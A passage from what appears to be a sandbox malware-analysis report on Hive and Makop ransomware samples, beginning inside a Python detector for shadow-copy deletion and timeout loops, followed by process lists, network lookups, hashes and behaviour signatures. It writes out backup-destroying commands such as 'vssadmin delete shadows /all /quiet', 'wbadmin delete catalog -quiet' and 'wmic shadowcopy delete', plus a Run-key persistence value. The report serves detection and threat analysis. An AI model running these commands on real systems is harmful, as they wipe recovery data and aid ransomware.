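    (688, 4344, r"C:\Windows\system32\cmd.exe", r"C:\Windows\system32\cmd.exe /c hive.bat >NUL 2>NUL"),
    (1424, 4344, r"C:\Windows\system32\cmd.exe", r"C:\Windows\system32\cmd.exe /c shadow.bat >NUL 2>NUL"),
    (1436, 1424, r"C:\Windows\system32\vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
    (5000, 1000, r"C:\Windows\explorer.exe", "explorer.exe"),
    (7001, 5000, r"C:\Windows\system32\cmd.exe", "cmd.exe /c vssadmin list shadows"),
    (7002, 7001, r"C:\Windows\system32\vssadmin.exe", "vssadmin list shadows"),
] + [
    (pid, 688, r"C:\Windows\system32\timeout.exe", "timeout 1")
    for pid in (4332, 3456, 1012, 228, 376, 2608, 1932, 4512)
]

# Directories a normal user can write to; a binary running from here is a weak
# signal on its own but a strong one as the root of a shadow-copy deletion.
SUSPICIOUS_DIR = re.compile(r"\\(AppData\\Local\\Temp|ProgramData|Users\\Public)\\", re.IGNORECASE)
SHADOW_DELETE = re.compile(r"\bdelete\s+shadows\b", re.IGNORECASE)
BATCH_LAUNCH = re.compile(r"\s/c\s+\S+\.bat\b", re.IGNORECASE)


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


class ProcessTree:
    def __init__(self, events):
        self.proc = {pid: {"ppid": ppid, "image": image, "cmd": cmd}
                     for pid, ppid, image, cmd in events}
        self.children = defaultdict(list)
        for pid, ppid, _, _ in events:
            self.children[ppid].append(pid)

    def ancestors(self, pid):
        """PIDs from the parent upward, stopping at unknown PIDs or a cycle."""
        out, seen = [], {pid}
        ppid = self.proc[pid]["ppid"]
        while ppid in self.proc and ppid not in seen:
            out.append(ppid)
            seen.add(ppid)
            ppid = self.proc[ppid]["ppid"]
        return out


def detect(events, timeout_burst=5):
    """Return findings for the three behaviours this report flags."""
    tree = ProcessTree(events)
    findings = []
    for pid, p in tree.proc.items():
        name = image_name(p["image"])
        # Rule 1: vssadmin deleting shadow copies (T1490). Record the nearest
        # ancestor that runs from a user-writable directory as the origin.
        if name == "vssadmin.exe" and SHADOW_DELETE.search(p["cmd"]):
            origin = next((a for a in tree.ancestors(pid)
                           if SUSPICIOUS_DIR.search(tree.proc[a]["image"])), None)
            findings.append({"rule": "shadow_copy_deletion", "pid": pid,
                             "origin": origin, "technique": "T1490"})
        # Rule 2: cmd.exe /c <something>.bat whose parent lives in a user-writable
        # directory, which is how both hive.bat and shadow.bat are launched here.
        if name == "cmd.exe" and BATCH_LAUNCH.search(p["cmd"]):
            parent = tree.proc.get(p["ppid"])
            if parent and SUSPICIOUS_DIR.search(parent["image"]):
                findings.append({"rule": "batch_from_temp_binary", "pid": pid,
                                 "origin": p["ppid"], "technique": "T1059.003"})
    # Rule 3: one parent spawning a burst of timeout.exe children, the
    # "Delays execution with timeout.exe" pattern (T1497.003).
    for ppid, kids in tree.children.items():
        n = sum(1 for k in kids if image_name(tree.proc[k]["image"]) == "timeout.exe")
        if n >= timeout_burst:
            findings.append({"rule": "timeout_loop", "pid": ppid,
                             "count": n, "technique": "T1497.003"})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f)
```

A real deployment would feed Sysmon Event ID 1 or EDR process-create records into `detect` instead of the inline list. The burst threshold is the interesting knob: a handful of `timeout` calls is normal in installer scripts, but hundreds of `timeout 1` children under one cmd.exe, as in the process list that follows, is a loop waiting for a file handle to close, and the count rather than any single event is what separates the two.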

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c hive.bat >NUL 2>NUL

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c shadow.bat >NUL 2>NUL

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\timeout.exe (106 further identical process instances)

timeout 1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\system32\timeout.exe (349 identical process instances)

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp

Files

memory/4344-0-0x0000000000690000-0x0000000000969000-memory.dmp

C:\$Recycle.Bin\S-1-5-21-2990742725-2267136959-192470804-1000\desktop.ini

MD5 1efa7a4ff08615c29e8b642f1b5059e0
SHA1 9919795fa66a06bfc1b7e6a7a51b2966a741f80c
SHA256 08b65110cbf178c66255a3ea9a22e3dd90e0da1e380a3c592e9044ac0fd3fc68
SHA512 c7ca1e6a08d90c14480abec92e74a652a1046587e9da103bc4c1734ff57024b82631741a2a1c7436779b848360eea632196a8112577951aaaeffdd5a7e6ded10

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\hive.bat

MD5 6358d970c3edccb57eae7dbf9f42d58f
SHA1 25b994c3b5604f4f67e1ac6250bc2f14ce690380
SHA256 9e36401051e677f69a82ab8fbdebd6b16210ee40612c8c7fa45ceb5d7757fe50
SHA512 44819fec7e90b903eece750d0a2de531520ed9e637e17e4a57786f9a61c6d4b95ff6072fc3530a9d35d8dc756bcfe20f80a6a07a72d35cf24b305053ae389131

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\shadow.bat

MD5 df5552357692e0cba5e69f8fbf06abb6
SHA1 4714f1e6bb75a80a8faf69434726d176b70d7bd8
SHA256 d158f9d53e7c37eadd3b5cc1b82d095f61484e47eda2c36d9d35f31c0b4d3ff8
SHA512 a837555a1175ab515e2b43da9e493ff0ccd4366ee59defe6770327818ca9afa6f3e39ecdf5262b69253aa9e2692283ee8cebc97d58edd42e676977c7f73d143d

memory/4344-346-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-878-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-1121-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-1506-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-2638-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-3081-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-3517-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-3928-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-4316-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-4823-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-5729-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-6397-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-8184-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-9381-0x0000000000690000-0x0000000000969000-memory.dmp

C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.xhylKSmuz5RNbZ6NUxzXXgzw-YBgsl0SbEc6JFIZfXQ.hive

MD5 6b87631b89ce2301b19e290520260b59
SHA1 cb3b46515d43ea1f79b2edccd45f5143244e129b
SHA256 7533bbeadd451eb9a2fb1d3280b415a4a7cc1b7610d5ca4b5b72b7c0ff3a5807
SHA512 088bd71dae75ef3f44b184950a540828319905de60a8c3276c49614e6ca642f3eb7cdc8af4761386a1260097fb9aae0388f8503cbe6128cacbd224af363ed674

memory/4344-10109-0x0000000000690000-0x0000000000969000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win10v2004-20240709-en

Max time kernel

137s

Max time network

135s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3728 -ip 3728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3728 -s 948

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\nsa9F9C.tmp\System.dll

MD5 fccff8cb7a1067e23fd2e2b63971a8e1
SHA1 30e2a9e137c1223a78a0f7b0bf96a1c361976d91
SHA256 6fcea34c8666b06368379c6c402b5321202c11b00889401c743fb96c516c679e
SHA512 f4335e84e6f8d70e462a22f1c93d2998673a7616c868177cac3e8784a3be1d7d0bb96f2583fa0ed82f4f2b6b8f5d9b33521c279a42e055d80a94b4f3f1791e0c

Analysis: behavioral31

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:44

Platform

win7-20240705-en

Max time kernel

144s

Max time network

133s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

Signatures

Makop

ransomware makop

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (8323) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\1 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RansomwareSamples\\MAKOP_27_10_2020_115KB.exe\"" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A

Drops file in Program Files directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2052 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1888 wrote to memory of 1124 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Windows\system32\cmd.exe
PID 1124 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1124 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 1124 wrote to memory of 1860 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1960 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2356 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n1888

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n1888

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n1888

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n1888

Network

Country Destination Domain Proto
US 8.8.8.8:53 iplogger.org udp
US 172.67.132.113:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
FR 216.58.214.67:80 c.pki.goog tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.18.190.71:80 crl.microsoft.com tcp

Files

\Users\Admin\AppData\Local\Temp\nsyF1BF.tmp\System.dll

MD5 fccff8cb7a1067e23fd2e2b63971a8e1
SHA1 30e2a9e137c1223a78a0f7b0bf96a1c361976d91
SHA256 6fcea34c8666b06368379c6c402b5321202c11b00889401c743fb96c516c679e
SHA512 f4335e84e6f8d70e462a22f1c93d2998673a7616c868177cac3e8784a3be1d7d0bb96f2583fa0ed82f4f2b6b8f5d9b33521c279a42e055d80a94b4f3f1791e0c

memory/1888-7-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1888-10-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1888-9-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1888-16-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1888-26-0x0000000000400000-0x000000000041F000-memory.dmp

C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\readme-warning.txt

MD5 d171c561e20fc9714f85da3c4331d0b6
SHA1 8f7e6cd4bda627a0a3d1a0e687c8b998db3b9438
SHA256 3c829147b1f82f255e4032d2a22d5b83932bc7f74f3540137146530be0353aac
SHA512 b52823ac0dba9dec6a243d1a3d68718c2a825dae4d6f4f312e92d87ecb87dbb066f259b317628fa588ad1abc4a59e095e5e302e53294bd8b34d414fadc8420c2

C:\Users\Admin\AppData\Roaming\779389082

MD5 40b7f298d30296864906d4e175ff9f43
SHA1 349b60915d0ce78aacc57231ae1e0df151e20087
SHA256 2448a49c12e2c959a2f88d179c346a4d753725578a4755c8f8f487b1048fdcd4
SHA512 ed4c76fa8e4e0eb527f34ea6a25094ee8bdc343be1c0806bcb8baff3cd77e6944cee50125090a7fd8869951b53ced7dce4a48a197859a1e4616c7495390b36e7

memory/1888-3038-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2548-3974-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2548-4646-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2548-4645-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Roaming\779389082

MD5 9004a085c4f744f4b0da676dcea1d70e
SHA1 f7119472a14b4d8292c07dd97ee1ae50713a7900
SHA256 7e62775833adf9177f3b95b60a8ae73b7942ad3b701752478af89516dcb2f237
SHA512 d5a8d02b944a1d1c4698ed9b50c8e67370468ee99105f933acd0e46244fef3b151e783516d49ea3d32e28f7a10d1a64498c1ff36892bd73af1c5b9979d973c04

memory/1888-17641-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2676-17696-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2676-17698-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2676-17697-0x0000000000400000-0x000000000041F000-memory.dmp